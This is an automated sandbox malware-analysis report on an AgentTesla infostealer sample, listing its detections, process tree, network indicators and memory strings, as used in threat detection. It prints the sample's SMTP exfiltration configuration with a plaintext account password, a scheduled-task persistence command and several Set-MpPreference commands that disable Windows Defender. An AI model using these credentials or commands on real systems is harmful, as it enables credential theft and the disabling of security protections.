
Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Analysis ID: 756116
MD5: fe1aa7fa995970ebb34465d5dc0d8ce1
SHA1: 7505b261cc9df8c6ab8f10e035cf8d8319043cdb
SHA256: 655b12a219d0f0e39a84fe44483e25411be852ce2bb0d451a1cb1a9a670f70b8
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • nrQtAokXKaSn.exe (PID: 5976 cmdline: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
    • schtasks.exe (PID: 1372 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nrQtAokXKaSn.exe (PID: 2744 cmdline: {path} MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
    • nrQtAokXKaSn.exe (PID: 1008 cmdline: {path} MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}
Source | Rule | Description | Author | Strings
0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown |
  • 0x31cca:$a13: get_DnsResolver
  • 0x303f4:$a20: get_LastAccessed
  • 0x326d7:$a27: set_InternalServerPort
  • 0x32a20:$a30: set_GuidMasterKey
  • 0x30506:$a33: get_Clipboard
  • 0x30514:$a34: get_Keyboard
  • 0x318b5:$a35: get_ShiftKeyDown
  • 0x318c6:$a36: get_AltKeyDown
  • 0x30521:$a37: get_Password
  • 0x31010:$a38: get_PasswordHash
  • 0x3210b:$a39: get_DefaultCredentials
0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen |
  • 0x32bcc:$s10: logins
  • 0x3264c:$s11: credential
  • 0x2e906:$g1: get_Clipboard
  • 0x2e914:$g2: get_Keyboard
  • 0x2e921:$g3: get_Password
  • 0x2fca5:$g4: get_CtrlKeyDown
  • 0x2fcb5:$g5: get_ShiftKeyDown
  • 0x2fcc6:$g6: get_AltKeyDown
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown |
  • 0x300ca:$a13: get_DnsResolver
  • 0x2e7f4:$a20: get_LastAccessed
  • 0x30ad7:$a27: set_InternalServerPort
  • 0x30e20:$a30: set_GuidMasterKey
  • 0x2e906:$a33: get_Clipboard
  • 0x2e914:$a34: get_Keyboard
  • 0x2fcb5:$a35: get_ShiftKeyDown
  • 0x2fcc6:$a36: get_AltKeyDown
  • 0x2e921:$a37: get_Password
  • 0x2f410:$a38: get_PasswordHash
  • 0x3050b:$a39: get_DefaultCredentials
0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifacts associated with disabling Windows Defender | ditekSHen |
  • 0x29ecc:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
  • 0x29f10:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x29f58:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x2a1e4:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
  • 0x2a248:$s2: Set-MpPreference -DisableArchiveScanning $true
  • 0x2a2a0:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
  • 0x2a2f8:$s4: Set-MpPreference -DisableScriptScanning $true
  • 0x2a344:$s5: Set-MpPreference -SubmitSamplesConsent 2
  • 0x2a384:$s6: Set-MpPreference -MAPSReporting 0
  • 0x2a3d0:$s7: Set-MpPreference -HighThreatDefaultAction 6
  • 0x2a428:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
  • 0x2a478:$s9: Set-MpPreference -LowThreatDefaultAction 6
  • 0x2a4c8:$s10: Set-MpPreference -SevereThreatDefaultAction 6

              Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, ParentProcessId: 4580, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp, ProcessId: 5756, ProcessName: schtasks.exe
Timestamp: 11/29/22-16:51:24.449797
Source IP: 192.168.2.6
Destination IP: 111.118.212.38
SID: 2030171
Source Port: 49717
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/29/22-16:52:18.188399
Source IP: 192.168.2.6
Destination IP: 111.118.212.38
SID: 2030171
Source Port: 49722
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected


              AV Detection

Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | ReversingLabs: Detection: 31%
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Joe Sandbox ML: detected
Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vaoPXhU.pdb | source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, nrQtAokXKaSn.exe.0.dr

              Networking

Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49717 -> 111.118.212.38:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49722 -> 111.118.212.38:587
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 3.232.242.170
Source: Joe Sandbox View | IP Address: 3.232.242.170
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.6:49717 -> 111.118.212.38:587
Source: global traffic | TCP traffic: 192.168.2.6:49717 -> 111.118.212.38:587
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://UrUbMY.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.strictfacilityservices.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://strictfacilityservices.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268958128.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268838022.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html/
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270302429.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270410317.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270179920.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270233958.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.com%(
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com.TTF
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272447141.0000000005A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272325014.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comB.TTF
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comE.TTF
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comalsd
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comasF;-
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comcomt
